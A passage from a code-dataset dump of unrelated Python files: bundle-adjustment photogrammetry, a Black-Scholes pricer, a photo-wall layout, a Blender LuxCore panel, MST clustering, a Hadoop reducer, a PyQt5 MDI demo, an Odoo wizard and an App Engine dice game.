f*(-M[0,1]+U/W*M[2,1])/W\n\t\t\tB13 = f*(-M[0,2]+U/W*M[2,2])/W\n\t\t\tB14 = f*(Uo-U/W*Wo)/W\n\t\t\tB15 = f*(Up-U/W*Wp)/W\n\t\t\tB16 = f*(Uk-U/W*Wk)/W\n\t\t\t\n\t\t\tB17 = -B11\n\t\t\tB18 = -B12\n\t\t\tB19 = -B13\n\t\t\t\n\t\t\tB21 = f*(-M[1,0]+V/W*M[2,0])/W\n\t\t\tB22 = f*(-M[1,1]+V/W*M[2,1])/W\n\t\t\tB23 = f*(-M[1,2]+V/W*M[2,2])/W\n\t\t\tB24 = f*(Vo-V/W*Wo)/W\n\t\t\tB25 = f*(Vp-V/W*Wp)/W\n\t\t\tB26 = f*(Vk-V/W*Wk)/W\t\t\t\t\n\t\t\t\n\t\t\tB27 = -B21\n\t\t\tB28 = -B22\n\t\t\tB29 = -B23\n\t\t\t\n\t\t\tA_s = np.array([[1,0],[0,1]])\n\t\t\t\n\t\t\tFF[2*i:2*i+2,:] = F_s\n\t\t\tAA[2*i:2*i+2,2*i:2*i+2] = A_s\n\t\t\tBB[2*i:2*i+2,6*img_ind:6*img_ind+6] = np.array([[B11, B12, B13, B14, B15, B16],[B21, B22, B23, B24, B25, B26]])\n\t\t\tBB[2*i:2*i+2,6*len(image_list)+3*pt_ind:6*len(image_list)+3*pt_ind+3] = np.array([[B17, B18, B19],[B27, B28, B29]])\n\n\n\t\tQ=inv(WW)\n\t\tff=-FF-matmul(AA,(L0-L))\n\t\tQe=matmul(matmul(AA,Q),AA.T)\n\t\tWe=inv(Qe)\n\t\t\n\t\tN=matmul(matmul(BB.T,We),BB)\n\t\tt=matmul(matmul(BB.T,We),ff)\n\t\tfx=delta-delta_0\n\t\tddel=matmul(inv(N+Wxx),(t-matmul(Wxx,fx)))\n\t\t\n\t\tv=matmul(matmul(matmul(Q,AA.T),We),(ff-matmul(BB,ddel)))\n\t\t\n\t\tvvx=fx+ddel\n\t\tphi=matmul(matmul(v.T,WW),v)+matmul(matmul(vvx.T,Wxx),vvx)\n\t\tobj=abs((last_phi-phi[0,0])/last_phi)\n\t\tprint(\"iter number: \"+str(iter))\n\t\tprint(\"objective function is : \"+str(obj))\n\t\t#Convergence check\n\t\tif obj<0.0001:\n\t\t\tkeep_going=0\n\t\t\tprint(\"Converged\")\n\t\t\t\n\t\t\trmse_vx=np.sqrt(np.sum(v[0::2]**2)/len(v[0::2]))\n\t\t\trmse_vy=np.sqrt(np.sum(v[1::2]**2)/len(v[1::2]))\n\t\t\t\n\t\t\tprint(rmse_vx)\n\t\t\tprint(rmse_vy)\t\t\n\t\t\t\n\t\t\twith open(argv[5],'a') as output_file:\n\t\t\t\tcsv_writer = csv.writer(output_file)\n\t\t\t\tcsv_writer.writerow([\"residuals\"])\n\t\t\t\tcsv_writer.writerow([\"rmse x\"])\n\t\t\t\tcsv_writer.writerow([np.sqrt(sum(v[0::2]**2)/len(v[0::2]))])\n\t\t\t\tcsv_writer.writerow([\"rmse y\"])\n\t\t\t\tcsv_writer.writerow([np.sqrt(sum(v[1::2]**2)/len(v[1::2]))])\n\t\t\t\t\t\t\n\t\t\tfor i in range(no_obs):\n\t\t\t\timg_ind=image_list.index(control[i]['img_id'])\n\t\t\t\tpt_ind=control_list.index(control[i]['point_id'])\n\t\t\t\tx = L[2*i,0] \n\t\t\t\ty = L[2*i+1,0]\n\t\t\t\tXL = delta[6*img_ind,0]\n\t\t\t\tYL = delta[6*img_ind+1,0]\n\t\t\t\tZL = delta[6*img_ind+2,0]\n\t\t\t\to = delta[6*img_ind+3,0]\n\t\t\t\tp = delta[6*img_ind+4,0]\n\t\t\t\tk = delta[6*img_ind+5,0]\n\t\t\t\tX=delta[6*len(image_list)+3*pt_ind,0]\n\t\t\t\tY=delta[6*len(image_list)+3*pt_ind+1,0]\t\t\t\n\t\t\t\tZ=delta[6*len(image_list)+3*pt_ind+2,0]\n\n\t\tif keep_going==1:\t\n\t\t\tL=L0+v\n\t\t\tdelta=delta+ddel\n\n\t\tif iter>100:\n\t\t\tkeep_going=0\n\t\t\tprint(\"too many iterations\")\n\n\t\tlast_phi = phi[0,0]\n\t\titer=iter+1\n\t\tresult={}\n\twith open(argv[5],'a') as output_file:\n\t\tcsv_writer = csv.writer(output_file)\n\t\tcsv_writer.writerow([\"Exterior Orientation Parameters\"])\n\t\tresult_eo={}\n\t\tfor i in range(len(image_list)):\n\t\t\teo_i={}\n\t\t\teo_i['XL']=delta[6*i,0]\n\t\t\teo_i['YL']=delta[6*i+1,0]\n\t\t\teo_i['ZL']=delta[6*i+2,0]\n\t\t\teo_i['omega']=delta[6*i+3,0]\n\t\t\teo_i['phi']=delta[6*i+4,0]\n\t\t\teo_i['kappa']=delta[6*i+5,0]\n\t\t\tresult_eo[image_list[i]]=eo_i\n\t\t\t\n\t\t\tcsv_writer.writerow([image_list[i]])\n\t\t\tcsv_writer.writerow(['XL(ft): '+str(delta[6*i,0])])\n\t\t\tcsv_writer.writerow(['YL(ft): '+str(delta[6*i+1,0])])\n\t\t\tcsv_writer.writerow(['ZL(ft): 
'+str(delta[6*i+2,0])])\n\t\t\tcsv_writer.writerow(['omega(rad): '+str(delta[6*i+3,0])])\n\t\t\tcsv_writer.writerow(['phi(rad): '+str(delta[6*i+4,0])])\n\t\t\tcsv_writer.writerow(['kappa(rad): '+str(delta[6*i+5,0])])\n\t\t\tcsv_writer.writerow(\" \")\n\t\t\n\t\tcsv_writer.writerow([\"scale factor\"])\n\t\tscale={}\n\t\tfor i in range(no_obs):\n\t\t\timg_ind=image_list.index(control[i]['img_id'])\n\t\t\tpt_ind=control_list.index(control[i]['point_id'])\n\t\t\tif control[i]['img_id'] not in scale.keys():\n\t\t\t\tscale[control[i]['img_id']]=[]\n\t\t\t\n\t\t\tx = L[2*i,0] \n\t\t\ty = L[2*i+1,0]\n\t\t\tXL = delta[6*img_ind,0]\n\t\t\tYL = delta[6*img_ind+1,0]\n\t\t\tZL = delta[6*img_ind+2,0]\n\t\t\to = delta[6*img_ind+3,0]\n\t\t\tp = delta[6*img_ind+4,0]\n\t\t\tk = delta[6*img_ind+5,0]\n\t\t\tX=delta[6*len(image_list)+3*pt_ind,0]\n\t\t\tY=delta[6*len(image_list)+3*pt_ind+1,0]\t\t\t\n\t\t\tZ=delta[6*len(image_list)+3*pt_ind+2,0]\n\t\t\tM = np.array([[cos(p)*cos(k), cos(o)*sin(k)+sin(o)*sin(p)*cos(k), sin(o)*sin(k)-cos(o)*sin(p)*cos(k)],\n\t\t\t\t\t[-cos(p)*sin(k), cos(o)*cos(k)-sin(o)*sin(p)*sin(k), sin(o)*cos(k)+cos(o)*sin(p)*sin(k)],\n\t\t\t\t\t[sin(p), -sin(o)*cos(p), cos(o)*cos(p)]])\n\t\t\tk = matmul(inv(M),np.array([[x],[y],[-f]]))/np.array([[X-XL],[Y-YL],[Z-ZL]])\n\t\t\tcsv_writer.writerow(['k: '+str(k.T)+\" for image:\"+str(image_list[img_ind])+\" for point:\"+str(pt_ind)])\n\t\t\tscale_pt={}\n\t\t\tscale_pt[control[i]['point_id']]=np.mean(k)\n\t\t\tscale[control[i]['img_id']].append(scale_pt)\n\t\t\t\n\t\tcsv_writer.writerow([\"Control Points, Pass Points Coordinates\"])\n\t\tresult_cp={}\n\t\tfor i in range(len(control_list)):\n\t\t\tcp_i={}\n\t\t\tcp_i['X']=delta[6*len(image_list)+3*i,0]\n\t\t\tcp_i['Y']=delta[6*len(image_list)+3*i+1,0]\n\t\t\tcp_i['Z']=delta[6*len(image_list)+3*i+2,0]\n\t\t\tresult_cp[control_list[i]]=cp_i\t\t\n\t\t\tcsv_writer.writerow([control_list[i]])\n\t\t\tcsv_writer.writerow(['X(ft): '+str(delta[6*len(image_list)+3*i,0])])\n\t\t\tcsv_writer.writerow(['Y(ft): '+str(delta[6*len(image_list)+3*i+1,0])])\n\t\t\tcsv_writer.writerow(['Z(ft): '+str(delta[6*len(image_list)+3*i+2,0])])\n\t\t\tcsv_writer.writerow(\" \")\n\t\tresult['eo'] = result_eo\n\t\tresult['cp'] = result_cp\n\t\tresult['scale'] = scale\n\t\toutput_json = json.dumps(result, indent = 4)\n\n\t\tjson_fname = \".\".join([os.path.splitext(argv[5])[0],\"json\"])\n\t\twith open(json_fname,'w') as output_file:\n\t\t\toutput_file.write(output_json)\n\n\n\nif __name__==\"__main__\":\n\tmain()\n","sub_path":"bba_nr.py","file_name":"bba_nr.py","file_ext":"py","file_size_in_byte":15116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"259915","text":"#\r\n# PRO: BS.py\r\n#\r\n# PURPOSE: Use Black-Scholes European price equation to price call and put option based upon required inputs (S, K, sigma, delta, r, time to maturity (years))\r\n#\r\n# DATE: 2/12/2022\r\n#\r\n# AUTHOR: R.H.\r\n#\r\n\r\nimport pandas as pd\r\n\r\nimport math\r\nimport numpy as np\r\nfrom scipy.stats import norm\r\nimport os \r\n\r\n# Where am I?\r\nprint(os.getcwd())\r\n\r\n\r\ndef BS(S, K, sigma, delta, r, time):\r\n d1 = ((np.log(S/K)) + (((r-delta)+.5*sigma*sigma)*time))\r\n d1= d1/(sigma*math.sqrt(time))\r\n nd1 = norm.cdf(d1,loc=0, scale=1)\r\n\r\n d2 = d1 -sigma*math.sqrt(time)\r\n nd2 = norm.cdf(d2,loc=0, scale=1)\r\n\r\n\r\n BS_CALL = S*np.exp(-delta*time)*nd1 - K*np.exp(-r*time)*nd2 \r\n BS_PUT = BS_CALL + K*np.exp(-r*time) - S*np.exp(-delta*time)\r\n\r\n BS_CALL = round(BS_CALL, 
ndigits = 4)\r\n BS_PUT = round(BS_PUT, ndigits = 4)\r\n\r\n ####### GREEKS START HERE ##########\r\n DELTA_CALL = np.exp(-delta*(time))*norm.cdf(d1,loc=0, scale=1)\r\n DELTA_PUT = -np.exp(-delta*time)*norm.cdf(-d1, loc=0, scale=1) \r\n \r\n GAMMA_CALL = (np.exp(-delta*time)* norm.pdf(d1, loc = 0, scale = 1))/(S*sigma*np.sqrt(time))\r\n GAMMA_PUT = GAMMA_CALL \r\n \r\n THETA_CALL = delta*S*np.exp(-delta*(time))*norm.cdf(d1,loc = 0, scale = 1) - r*K*np.exp(-r*(time))*norm.cdf(d2,loc = 0,scale=1) - ((K*np.exp(-r*(time))*norm.pdf(d2,loc = 0,scale=1)*sigma)/(2*np.sqrt(time))) \r\n THETA_PUT = THETA_CALL + r*K*np.exp(-r*(time)) - delta * S*np.exp(-delta*(time))\r\n \r\n VEGA_CALL = S*np.exp(-delta*time)*norm.pdf(d1,loc = 0,scale =1)*np.sqrt(time)\r\n VEGA_PUT = VEGA_CALL\r\n \r\n RHO_CALL = time*K*np.exp(-r*time)*norm.cdf(d2,loc = 0,scale =1)\r\n RHO_PUT = -time*K*np.exp(-r*time)*norm.cdf(-d2, loc = 0, scale=1)\r\n \r\n PSI_CALL = -time*S*np.exp(-delta*time)*norm.cdf(d1, loc = 0, scale =1)\r\n PSI_PUT = time*S*np.exp(-delta*time)*norm.cdf(-d1,loc = 0, scale=1)\r\n ########## GREEKS END HERE ##########\r\n\r\n d = {'CALL':[BS_CALL, DELTA_CALL, GAMMA_CALL, THETA_CALL, VEGA_CALL, RHO_CALL, PSI_CALL], \r\n 'PUT' :[BS_PUT, DELTA_PUT, GAMMA_PUT, THETA_PUT, VEGA_PUT, RHO_PUT, PSI_PUT]}\r\n df = pd.DataFrame(data=d, index=['Price', 'Delta', 'Gamma', 'Theta', 'Vega', 'Rho', 'Psi'])\r\n\r\n return(df)\r\n\r\ndef BS_PRICE(S, K, sigma, delta, r, time):\r\n d1 = ((np.log(S/K)) + (((r-delta)+.5*sigma*sigma)*time))\r\n d1= d1/(sigma*math.sqrt(time))\r\n nd1 = norm.cdf(d1,loc=0, scale=1)\r\n\r\n d2 = d1 -sigma*math.sqrt(time)\r\n nd2 = norm.cdf(d2,loc=0, scale=1)\r\n\r\n\r\n BS_CALL = S*np.exp(-delta*time)*nd1 - K*np.exp(-r*time)*nd2 \r\n BS_PUT = BS_CALL + K*np.exp(-r*time) - S*np.exp(-delta*time)\r\n return(BS_CALL, BS_PUT)\r\n\r\n\r\n\r\n\r\n","sub_path":"BS.py","file_name":"BS.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"528412634","text":"import os\n\nbasedir = os.path.join(os.getcwd(), \"static\")\n\nclass Wall(object):\n def __init__(self, dict):\n self.dict = dict\n self.half_col = 0\n self.half_row = 0\n self.z = 0\n self.positons = []\n self.folder = os.path.join(basedir, dict)\n\n def create(self):\n wall = {0: (2, 5, 5000), 10: (2, 5, 5000), 20: (4, 5, 5000), 30: (5, 6, 5000), 40: (5, 8, 6000),\n 50: (5, 10, 6000),60: (6, 10, 6000), 70: (7, 10, 7000), 80: (8, 10, 7000),\n 90: (9, 10, 8000), 100: (10, 10, 9000)}\n col = 0\n row = 0\n print(self.dict, self.folder)\n filelist = []\n for f in os.listdir(self.folder):\n filelist.append(f)\n\n count = len(filelist)\n for k in wall.keys():\n if count in range(k - 10, k + 1):\n col, row, self.z = wall[k-10]\n for x in range(400, 900 * row, 900):\n for y in range(300, 700 * col, 700):\n #convert to set\n #must be '/'\n self.positons.append((self.dict+\"/\"+filelist.pop(), x, y, self.z))\n\n self.half_col = col * 900 / 2\n self.half_row = row * 700 / 2\n print(self.positons)\n return self.positons\n\n def overview(self):\n x = self.half_row\n y = self.half_col\n z = self.z * 2\n return [x, y, z]\n","sub_path":"pretty-photo-wall/wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"110805175","text":"from bl_ui.properties_render import RENDER_PT_render\nfrom . 
import icons\n\n# Note: The main LuxCore config UI is defined in ui/config.py\n# Each of the other render panels is also defined in their\n# own specific files in the ui/ folder.\n\n\ndef luxcore_render_draw(panel, context):\n layout = panel.layout\n scene = context.scene\n\n if scene.render.engine != \"LUXCORE\":\n return\n\n split = layout.split(percentage=0.66, align=True)\n row = split.row(align=True)\n row.operator(\"luxcore.start_pyluxcoretools\")\n row = split.row(align=True)\n op = row.operator(\"luxcore.open_website\", icon=icons.URL, text=\"Wiki\")\n op.url = \"https://wiki.luxcorerender.org/BlendLuxCore_Network_Rendering\"\n\n\ndef register():\n # We append our draw function to the existing Blender render panel\n RENDER_PT_render.append(luxcore_render_draw)\n\n\ndef unregister():\n RENDER_PT_render.remove(luxcore_render_draw)\n","sub_path":"All_In_One/addons/BlendLuxCore/ui/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"422365639","text":"from StopsDilepton.tools.helpers import getChain\n\nchannels = ['EE', 'MuMu', 'EMu']\nallChannels = ['all', 'EE', 'MuMu', 'EMu']\n\n#def loadChain(s, verbose=False):\n# '''Use this function to add the chain to the sample dictionary.\n#Will not load again if has already loaded'''\n# if not s.has_key('chain'):\n# if verbose:print \"Loading chain for sample %s. (Only the first time).\"%s['name']\n# s['chain']=getChain(s)\n\nfrom StopsDilepton.tools.helpers import mZ\ndef getZCut(mode, zMassRange=15):\n zstr = \"abs(dl_mass - \"+str(mZ)+\")\"\n if mode.lower()==\"onz\": return zstr+\"<=\"+str(zMassRange)\n if mode.lower()==\"offz\": return zstr+\">\"+str(zMassRange)\n return \"(1)\"\n\n","sub_path":"analysis/python/SetupHelpers.py","file_name":"SetupHelpers.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"478602961","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import *\nfrom sys import maxsize as max_integer\n\neuclidean_distance = lambda data, point: np.sqrt(np.sum(np.power(data - point, 2), axis = 1).reshape((len(data), 1)))\n\n\ndef minimum_spanning_tree(data, k = 3, q = 2, f = 2):\n \n #debug:\n #plt.gca().set_aspect('equal', adjustable='box')\n \n #construct the complete Graph G\n N = len(data)\n G = np.empty((N, 0)) \n for point in data:\n G = np.concatenate((G, euclidean_distance(data,point)), axis=1)\n \n ######################\n \n MST = np.zeros(G.shape)\n \n N = len(G)\n \n key = np.zeros(N)\n key.fill(max_integer)\n parent = np.zeros(N)\n \n key[0] = 0\n parent[0] = -1\n \n visited = np.zeros(N)\n \n for i in range(N - 1): #edges\n \n current_value = np.min(key[np.where(visited == 0)]) #take the min key where visited = 0\n \n current_node = -1\n for i, element in enumerate(key):\n if element == current_value and visited[i] == 0:\n current_node = i \n break\n \n visited[current_node] = 1\n \n for adj_node in range(N): #all nodes are adjacent\n \n if G[current_node, adj_node] < key[adj_node] and visited[adj_node] == 0 and G[current_node][adj_node] !=0:\n key[adj_node] = G[current_node, adj_node]\n parent[adj_node] = current_node\n \n \n #fill in MST table\n x_list = []\n y_list = []\n for i, j in enumerate(zip(key[1:], parent[1:]), start = 1):\n MST[j[1], i] = j[0]\n x_list.append(j[1])\n y_list.append(i)\n MST[i, j[1]] = j[0]\n \n \n #debug: visualize MST\n '''\n x, y= 
np.nonzero(MST)\n for ole in zip(x, y): \n plt.plot((data[ole[0], 0], data[ole[1], 0]), (data[ole[0], 1], data[ole[1], 1]), color = 'm') \n #plt.show()\n '''\n \n ##########################\n \n \n \n inconsistent = np.zeros(N - 1) #follows x_list, y_list\n \n #find all pairs of nodes of edges\n for i, nodes in enumerate(zip(x_list, y_list)):\n weight = MST[nodes[0], nodes[1]]\n list_of_weights_N1 = np.empty((0, 0))\n list_of_weights_N2 = np.empty((0, 0))\n \n list_of_weights_N1 = _recursion_util(nodes, k, list_of_weights_N1, MST)\n list_of_weights_N2 = _recursion_util(nodes[::-1], k, list_of_weights_N2, MST)\n \n #inconsistency criterion\n weight_mean_N1 = np.mean(list_of_weights_N1)\n weight_mean_N2 = np.mean(list_of_weights_N2)\n weight_std_N1 = np.std(list_of_weights_N1)\n weight_std_N2 = np.std(list_of_weights_N2)\n \n if weight > max(q * weight_std_N1 + weight_mean_N1, q * weight_std_N2 + weight_mean_N2) and \\\n weight / max(weight_mean_N1, weight_mean_N2) > f: \n inconsistent[i] = 1 \n \n \n #debug: show in graph inconsistent edges\n for i, inc in enumerate(inconsistent):\n if inc == 1:\n plt.text((data[x_list[i],0] + data[y_list[i],0])/2, (data[x_list[i],1] + data[y_list[i],1])/2 , \"inc\")\n plt.plot((data[x_list[i],0], data[y_list[i], 0] ), (data[x_list[i],1], data[y_list[i], 1]))\n \n #debug: show in graph weights\n '''for ind, g in enumerate(MST):\n for oe, weight in enumerate(g):\n if weight !=0:\n plt.text((data[ind,0] + data[oe, 0])/2, (data[ind, 1] + data[oe, 1])/2 , round(weight,2), fontsize=7)\n '''\n \n ##########################\n\n data = np.hstack((data, np.zeros((len(data), 1))))\n \n #get the indices where inconsistent is not zero\n inc_edges_indices = np.nonzero(inconsistent)\n \n for index in inc_edges_indices[0]:\n MST[x_list[index], y_list[index]] =MST[y_list[index], x_list[index]] = 0\n \n visited_nodes = np.zeros(N)\n \n #dfs from now on\n cluster_id = 1\n for s in range(N):\n if(visited_nodes[s] == 0):\n visited_nodes[s] = 1\n data[s, 2] = cluster_id\n _dfs_util(MST, s, visited_nodes, cluster_id, data)\n cluster_id += 1\n \n return data\n\n \ndef _dfs_util(MST, s, visited_nodes, cluster_id, data):\n adj_nodes = np.nonzero(MST[s, :])\n for node in adj_nodes[0]:\n if visited_nodes[node] == 0:\n visited_nodes[node] = 1\n data[node, -1] = cluster_id\n _dfs_util(MST, node, visited_nodes, cluster_id, data)\n \n \ndef _recursion_util(nodes, k, list_of_weights, MST):\n \n if k == 0: return list_of_weights\n \n current_node1 = nodes[0]\n current_node2 = nodes[1]\n \n adj_nodes = np.nonzero(MST[current_node1, :])\n adj_nodes = np.delete(adj_nodes, np.where(adj_nodes[0] == current_node2))\n \n if len(adj_nodes) == 0: return list_of_weights\n \n for node in adj_nodes:\n k = k - 1\n list_of_weights = np.append(list_of_weights, MST[node, current_node1])\n list_of_weights = _recursion_util((node, current_node1),k, list_of_weights, MST)\n k += 1\n \n return list_of_weights \n \n\n","sub_path":"graph_theory/MST.py","file_name":"MST.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"449962500","text":"#!/usr/bin/env python3\n\nfrom itertools import groupby\nfrom operator import itemgetter\nimport collections\nimport sys\n\n\ndef read_mapper_output(file, separator='\\t'):\n\tfor line in file:\n\t\tyield line.rstrip().split(separator, 1)\n\ndef main(separator='\\t'):\n\tfrom collections import OrderedDict\n\tsortedDictionary = {}\n\t# input comes from STDIN (standard 
input)\n\tdata = read_mapper_output(sys.stdin, separator=separator)\n\t# groupby groups multiple word-count pairs by word,\n\t# and creates an iterator that returns consecutive keys and their group:\n\t# current_word - string containing a word (the key)\n\t# group - iterator yielding all [\"<current_word>\", \"<count>\"] items\n\tfor current_word, group in groupby(data, itemgetter(0)):\n\t\ttry:\n\t\t\ttotal_count = sum(int(count) for current_word, count in group)\n\t\t\tsortedDictionary[current_word] = total_count\n\t\t\t# print(current_word + separator + str(total_count))\n\t\texcept ValueError:\n\t\t# count was not a number, so silently discard this item\n\t\t\tpass\n\tsortedDictionary = OrderedDict(sorted(sortedDictionary.items(), key=lambda kv: kv[1], reverse=True))\n\t# count = 10\n\tfor key,val in sortedDictionary.items():\n\t\t# if count >= 1 & count <= 10:\n\t\tprint (key, val)\n\t\t# count = count-1\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"MR/part2/twitter/word co-occurence/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"453292658","text":"import sys\n\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMdiArea, QMdiSubWindow, QTextEdit\n\n\nclass MainWin(QMainWindow):\n \"\"\"Main window\"\"\"\n count = 0\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.setWindowTitle(\"QMdiArea QMdiSubWindow 使用\")\n\n self.mdi_area = QMdiArea()\n self.setCentralWidget(self.mdi_area)\n\n menu_bar = self.menuBar()\n menu_file = menu_bar.addMenu(\"文件\")\n action_new = menu_file.addAction(\"新建\")\n action_new.setData(\"new\")\n action_save = menu_file.addAction(\"保存\")\n action_save.setData(\"save\")\n action_cascade = menu_file.addAction(\"级联&Cascade\")\n action_cascade.setData(\"cascade\")\n action_tiled = menu_file.addAction(\"平铺&Tiled\")\n action_tiled.setData(\"tiled\")\n menu_file.triggered.connect(self.window_action)\n\n def window_action(self, action):\n print(\"点击\", action.data())\n if action.data() == \"new\":\n MainWin.count += 1\n sub_win = QMdiSubWindow()\n sub_win.setWidget(QTextEdit())\n sub_win.setWindowTitle(\"子窗口 %d\" % MainWin.count)\n self.mdi_area.addSubWindow(sub_win)\n if action.data() == \"cascade\":\n self.mdi_area.cascadeSubWindows() # arrange subwindows in cascade\n if action.data() == \"tiled\":\n self.mdi_area.tileSubWindows() # arrange subwindows tiled\n\n\nif __name__ == \"__main__\":\n\n app = QApplication(sys.argv)\n win = MainWin()\n win.show()\n sys.exit(app.exec())","sub_path":"03_高级界面控件/示例内容/07_QMidArea, QMidSubWindow.py","file_name":"07_QMidArea, QMidSubWindow.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"421963337","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\n\nclass Wizard(models.TransientModel):\n _name = 'tsbd.wizard'\n name = fields.Char()\n res_model = fields.Char(default = lambda self: self._context.get('active_model'))\n log = fields.Text()\n \n @api.multi\n def save_avatar_player(self):\n players = self.env['tsbd.player'].search([('image_link', '!=', False)])\n for r in players:\n r.saved_image_view = r.image_view\n @api.multi\n def xoa_bxh_not_cated(self):\n not_cate_bxh = self.env['tsbd.bxh'].search([('cate_id','=',False)])\n not_cate_bxh.unlink()\n self.log = u'Đã xóa %s bxh'%(len(not_cate_bxh))\n return {\n 'type': 'ir.actions.act_window',\n 'res_model': 'tsbd.wizard',\n 'view_mode': 
'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'context':{'active_model':self.res_model},\n 'views': [(False, 'form')],\n 'target': 'new',\n }\n \n @api.multi\n def trig(self):\n if self.res_model =='tsbd.match':\n domain = [('state','=',u'Kết thúc')]\n else:\n domain = []\n not_cate_bxh = self.env[self.res_model].search(domain)\n not_cate_bxh.write({'trig':True})\n self.log = u'Đã trig %s Predict'%(len(not_cate_bxh))\n return {\n 'type': 'ir.actions.act_window',\n 'res_model': 'tsbd.wizard',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'context':{'active_model':self.res_model},\n 'views': [(False, 'form')],\n 'target': 'new',\n }\n \n def return_this(self):\n return {\n 'type': 'ir.actions.act_window',\n 'res_model': 'tsbd.wizard',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'res_id': self.id,\n 'context':{'active_model':self.res_model},\n 'views': [(False, 'form')],\n 'target': 'new',\n }\n \n @api.multi\n def xoa_bxh(self):\n cates = self.env['tsbd.cate'].search([('large_cate','=', True)])\n for c in cates:\n c.clear_bxh()\n self.log = u'Đã Clear BXH'\n return self.return_this()\n \n \n \n @api.multi\n def gen_bxh(self):\n cates = self.env['tsbd.cate'].search([('large_cate','=', True)])\n for c in cates:\n c.bxh()\n for c in cates:\n c.with_context(for_bet=True).bxh()\n self.log = u'Đã Gen BXH'\n return self.return_this()\n \n \n \n\n ","sub_path":"tsbd/wizard/wizard.py","file_name":"wizard.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"468775687","text":"import os\r\nimport random\r\n\r\nfrom google.appengine.api import users\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.ext.webapp import template\r\n\r\nfrom model import Game, Player, Dice, Score, Language\r\n\r\nfrom tools import manager\r\n\r\nclass YamsManager(manager.Manager):\r\n \"\"\"\r\n \"\"\"\r\n\r\n def new_game(self, game_name):\r\n \"\"\"\r\n \"\"\"\r\n game_name = game_name.strip()\r\n if game_name == '':\r\n game_name = ' '\r\n\r\n game_query = Game().all()\r\n game_query.filter('name =', game_name)\r\n\r\n if game_query.count() > 0:\r\n return None\r\n\r\n #\r\n game = Game()\r\n game.name = game_name\r\n #\r\n game.put()\r\n\r\n return game\r\n\r\n def new_player(self, player_name):\r\n \"\"\"\r\n \"\"\"\r\n player_name = player_name.strip()\r\n if player_name == '':\r\n player_name = ' '\r\n\r\n player_query = Player().all()\r\n player_query.filter('name =', player_name)\r\n player_query.order('name')\r\n\r\n if player_query.count() > 0:\r\n return None\r\n\r\n #\r\n player = Player()\r\n player.name = player_name\r\n #\r\n player.put()\r\n\r\n return player.key()\r\n\r\n def player(self):\r\n \"\"\"\r\n \"\"\"\r\n # set the template for edit\r\n self.template_values['players'] = Player().all()\r\n self.template_values['games'] = Game().all()\r\n\r\n # find the template\r\n path = os.path.join(os.path.dirname(__file__),\r\n '../templates', 'yams', 'player.html')\r\n\r\n # display the contact\r\n return template.render(path, self.template_values)\r\n\r\n def delete_player(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n\r\n try:\r\n player.score.delete()\r\n except:\r\n pass\r\n\r\n # dice deletion\r\n dice_query = Dice().all()\r\n dice_query.filter('player =', player)\r\n for dice in dice_query:\r\n dice.delete()\r\n\r\n player.delete()\r\n\r\n def init_score(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n #\r\n player = 
Player().get(player_key)\r\n\r\n #\r\n score = Score()\r\n #\r\n score.one = -1\r\n score.two = -1\r\n score.three = -1\r\n score.four = -1\r\n score.five = -1\r\n score.six = -1\r\n #\r\n score.three_of_kind = -1\r\n score.four_of_kind = -1\r\n score.full = -1\r\n score.small_suite = -1\r\n score.big_suite = -1\r\n score.lucky = -1\r\n score.yams = -1\r\n #\r\n score.put()\r\n\r\n #\r\n player.score = score\r\n #\r\n player.put()\r\n\r\n def __init_dice(self, player, dice_name):\r\n \"\"\"\r\n \"\"\"\r\n query = Dice().all()\r\n query.filter('player =', player)\r\n query.filter('name =', dice_name)\r\n\r\n if query.count() > 0:\r\n for dice in query:\r\n dice.delete()\r\n\r\n dice = Dice()\r\n dice.player = player\r\n dice.name = dice_name\r\n dice.turn = 1\r\n dice.selected = False\r\n dice.value = random.randint(1, 6)\r\n dice.put()\r\n\r\n def init_dices(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n\r\n self.__init_dice(player, 'dice1')\r\n self.__init_dice(player, 'dice2')\r\n self.__init_dice(player, 'dice3')\r\n self.__init_dice(player, 'dice4')\r\n self.__init_dice(player, 'dice5')\r\n\r\n def create_game(self, player_key):\r\n \"\"\"\r\n \"\"\"\r\n # set the template for edit\r\n self.template_values['player_key'] = player_key\r\n self.template_values['games'] = Game().all()\r\n\r\n # find the template\r\n path = os.path.join(os.path.dirname(__file__),\r\n '../templates', 'yams', 'create_game.html')\r\n\r\n # display the contact\r\n return template.render(path, self.template_values)\r\n\r\n def create(self, player_key, game_name):\r\n \"\"\"\r\n \"\"\"\r\n #\r\n game = self.new_game(game_name)\r\n if game:\r\n #\r\n player = Player().get(player_key)\r\n player.game = game\r\n player.put()\r\n return True\r\n\r\n # game wasn't created\r\n return 